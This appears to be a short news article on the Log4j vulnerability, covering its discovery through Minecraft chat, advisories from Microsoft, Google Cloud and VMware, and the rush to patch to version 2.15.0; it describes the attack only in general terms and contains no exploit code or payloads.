A major security flaw has been discovered in a piece of software called Log4j, which is used by millions of web servers. The bug leaves them vulnerable to attack, and teams around the world are scrambling to patch affected systems before hackers can exploit them.
It was first discovered by Minecraft players but soon it was realised that this vulnerability wasn’t just a Minecraft exploit, but works on every program using the Log4j library. Here’s how tech companies are responding to the security flaw that is potentially capable of putting the entire internet at risk.
- Microsoft said that Log4j vulnerability, will not only affect machines that mine cryptocurrencies but can cause more serious problems such as credential and data theft.
- Google Cloud in its security advisory notes that it is actively following the security vulnerability. “We are currently assessing the potential impact of the vulnerability for Google Cloud products and services. This is an ongoing event and we will continue to provide updates through our customer communications channels.”
- VMWare Inc, which makes computer virtualisation software, said Thursday that several of its products were likely affected by the Java-based Log4j. The cloud computing company listed all of its products and versions that are affected by the vulnerability.
Attackers can trick Log4j into running malicious code by forcing it to store a log entry that includes a particular string of text. The way hackers are doing this varies from program to program, but in Minecraft, it has been reported that this was done via chat boxes. A log entry is created to archive each of these messages, so if the dangerous string of text is sent from one user to another it will be implanted into a log.
What Can Do
Now hundreds of thousands of IT teams are scrabbling to update Log4j to version 2.15.0, and mostly fixes the issue. Teams will also need to scour their code for potential vulnerabilities and watch for hacking attempts. While patches to fix problems like this can emerge very quickly, especially when they are responsibly revealed to the development team, it takes time for everyone to apply them. Computers and web services are so complex now, and so layered with dozens of stacked levels of abstraction, code running on code, on code, that it could take months for all these services to update.